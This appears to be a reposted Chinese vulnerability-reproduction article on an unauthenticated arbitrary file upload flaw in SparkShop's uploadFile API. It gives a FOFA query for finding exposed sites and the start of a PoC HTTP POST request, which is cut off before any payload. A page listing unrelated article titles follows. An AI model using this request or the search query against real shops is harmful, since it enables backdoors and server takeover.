当前位置: 首页 > news >正文

SparkShop开源商城 uploadFile 任意文件上传漏洞复现

0x01 产品简介

SparkShop开源商城(也被称为星火商城)是一款基于ThinkPHP6和Element UI的开源免费可商用的高性能商城系统。适用于各类电商场景,包括但不限于B2C商城、新零售、分销商城等。无论是初创企业还是成熟品牌,都可以通过SparkShop快速搭建个性化独立商城,实现线上线下的融合营销。

0x02 漏洞概述

SparkShop开源商城 uploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:"SparkShop"

0x04 漏洞复现

PoC

POST /api/Common/uploadFile HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,a

http://www.mrgr.cn/news/12640.html

相关文章:

  • 内存删除的原理
  • 常用开发工具配置笔记
  • UE5 Widget文件编译Bug
  • 喜讯!原点安全荣获北京市“专精特新”中小企业认定
  • 8.22
  • 并发式服务器
  • JavaWeb基础 -- SpringMVC
  • 机器学习——支持向量机
  • ubuntu /windows 安装COLMAP
  • spring security 自定义图形验证码(web/前后端分离)
  • PEFT qwen2 lora微调模型训练案例
  • 达梦到达梦(dm-dm)创建dblink,报错:dblink连接丢失
  • 当外接硬盘接入到macOS上,只读不可写时,应当格式化
  • 网络基础:理解 IP 地址与网段(网段是什么,网段与IP地址)
  • MyBatis使用递归查询来实现多级菜单的功能
  • 【代码随想录|二叉树part04之后】
  • 王立铭脑科学50讲:32,危险,如何应对恐惧和焦虑
  • Module not found: Can‘t resolve ‘tls‘/Module not found: Can‘t resolve ‘net‘
  • 【Linux】初步识操作系统
  • nginx配置http和https